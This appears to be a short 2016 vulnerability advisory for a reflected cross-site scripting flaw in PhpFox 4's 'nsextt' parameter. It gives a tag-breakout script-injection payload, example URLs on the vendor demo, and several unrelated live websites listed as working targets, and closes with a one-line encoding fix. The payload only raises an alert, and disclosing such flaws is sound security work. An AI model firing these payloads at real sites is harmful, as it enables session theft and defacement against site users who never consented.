PHPFox 4 Cross Site Scripting
Posted on 10 June 2016
########################################### # Title : PhpFox4 Cross Site Scripting Vuln. # Author : bl4ck_MohajeM ( mohajem.war@gmail.com) # Software Link: http://www.phpfox.com/ # Version: 4 # Date : 06/09/2016 # Category: WebApps # Tested with : Ubuntu / Win ########################################### [Description] In this Cms theres is a Cross Site Scripting Vurlnerablities in 'nsextt' Parameter . PhpFox Get the value of this parameter from the Client without any php function Ani-XSS Function. Vuln. Input ==> /?nsextt= ########################################### [Proof of Concept] Add this Instead of '/?nsextt=' /?nsextt='"--></style></scRipt><scRipt>alert(0x0000D1)</scRipt> Then you wanna see the alert that cotain '209' ########################################### [Example] https://v4.phpfox.com/v/category/69/comedy/?nsextt=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(0x0000D1)%3C/scRipt%3E https://v4.phpfox.com/blog/ https://v4.phpfox.com/photo/ https://v4.phpfox.com/forum/ https://v4.phpfox.com/poll/ https://v4.phpfox.com/quiz/ https://v4.phpfox.com/event/ https://v4.phpfox.com/music/ https://v4.phpfox.com/marketplace/ https://v4.phpfox.com/pages/ https://v4.phpfox.com/invite/ demo : tabrizcloob.ir/forum//?nsextt='"--></style></scRipt><scRipt>alert(0x0000D1)</scRipt> alachikh.ir/poll//?nsextt='"--></style></scRipt><scRipt>alert(0x0000D1)</scRipt> facebook2.ir/event//?nsextt='"--></style></scRipt><scRipt>alert(0x0000D1)</scRipt> avs.ir/music//?nsextt='"--></style></scRipt><scRipt>alert(0x0000D1)</scRipt> ########################################### [Solution] Programmer should encode those data we gain from Clients . ########################################### tnx : sha4yan - arf1372 - Milad Hacking - n1arash - Und3rgrounD - shabgard - b3hz4d ###########################################
